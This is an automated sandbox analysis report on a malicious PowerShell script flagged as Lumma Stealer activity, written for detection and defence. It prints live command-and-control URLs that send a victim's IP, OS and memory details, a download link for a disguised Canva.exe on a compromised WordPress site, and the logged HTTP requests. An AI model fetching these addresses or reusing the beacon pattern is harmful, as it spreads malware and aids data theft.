
Windows Analysis Report
oNvY66Z8jp.ps1

Overview

General Information

Sample name: oNvY66Z8jp.ps1 (renamed because the original name is a hash value)
Original sample name: 5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d.ps1
Analysis ID: 1617746
MD5: 979fbff01ba40f65e4eae87012b024a0
SHA1: 4ff2c55e9b40206244f6f93b097a818cffb0d6d2
SHA256: 5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d
Tags: 91-206-178-120, ps1, user-JAMESWT_MHT

Detection

Score: 80
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • powershell.exe (PID: 5676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 2556 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\oNvY66Z8jp.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5572, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", ProcessId: 5676, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5572, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", ProcessId: 5676, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T08:27:32.949584+0100 | 2021697 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.149.252 | 443 | TCP
2025-02-18T08:27:33.894508+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:27:32.048026+0100 | 2860232 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49705 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:27:32.048110+0100 | 2860233 | 1 | Malware Command and Control Activity Detected | 91.206.178.120 | 5001 | 192.168.2.5 | 49705 | TCP
2025-02-18T08:27:29.827006+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 104.26.12.205 | 80 | TCP
2025-02-18T08:27:32.048026+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:27:32.949584+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 172.67.149.252 | 443 | TCP
2025-02-18T08:27:33.894508+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 91.206.178.120 | 5001 | TCP


AV Detection

Source: http://91.206.178.120:5001/script_end?random_number=$randomNumber | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number= | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=91530 | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip= | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001 | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=91530$M | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | Avira URL Cloud: Label: malware
Source: oNvY66Z8jp.ps1 | Virustotal: Detection: 14%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.3% probability
Source: unknown | HTTPS traffic detected: 172.67.149.252:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Networking

Source: Network traffic | Suricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.5:49705 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.5:49705
Source: Network traffic | Suricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.5:49706 -> 172.67.149.252:443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49707
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 91.206.178.120:5001
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | ASN Name: ARTNET2PL
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 104.26.12.205:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49707 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49706 -> 172.67.149.252:443
Source: global traffic | HTTP traffic detected:
    GET /wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: hostelaunpaso.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: api.ipify.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 91.206.178.120:5001
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /script_end?random_number=91530 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 91.206.178.120:5001
Source: unknown | TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: hostelaunpaso.com
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Tue, 18 Feb 2025 07:27:32 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    strict-transport-security: max-age=15768000; includeSubDomains
    cf-cache-status: BYPASS
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzbYHRAAxRQwPViaa0Jrqj8yy13yAZ1OBap9FJFhjh9sL9TpCvVg1PyAW3OZLJHk9mzXqt6Ou9%2FtQ3vrC5dkMWLB5Pr4f6vjcrblJX81xLBqmeiG98dYijoZCIXU%2FW7H2EmSDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 913c4b951a752394-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1934&rtt_var=734&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=860&delivery_rate=1481481&cwnd=252&unsent_bytes=0&cid=f72ead2660dac038&ts=393&x=0"
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=91530
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=91530$M
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/P&
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/p
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify8r
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2176348749.00000000052CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hostelaunpaso.com/wp-cont
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | String found in binary or memory: https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search
Source: powershell.exe, 00000000.00000002.2176348749.0000000004A03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://hostelaunpaso.commd
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: classification engine | Classification label: mal80.troj.winPS1@3/7@2/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otxbg1dy.nwk.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknown Network traffic detected: HTTP traffic on port 5001 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 5001
Source: unknown Network traffic detected: HTTP traffic on port 5001 -> 49707
